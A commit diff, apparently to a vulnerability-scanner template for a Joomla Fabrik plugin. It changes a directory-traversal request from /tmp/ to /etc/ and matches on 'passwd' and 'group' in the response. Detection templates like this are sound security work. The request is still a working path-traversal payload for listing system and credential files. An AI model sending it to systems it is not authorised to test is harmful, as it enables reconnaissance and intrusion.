commit
8f6ae85e52
|
@ -18,16 +18,16 @@ info:
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/'
|
- '{{BaseURL}}/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../etc/'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
|
||||||
- '"value":'
|
|
||||||
- '"disable":false'
|
|
||||||
- 'text'
|
|
||||||
part: body
|
part: body
|
||||||
|
words:
|
||||||
|
- '"value":"passwd"'
|
||||||
|
- '"value":"group"'
|
||||||
|
- '"disable":false'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
|
|
Loading…
Reference in New Issue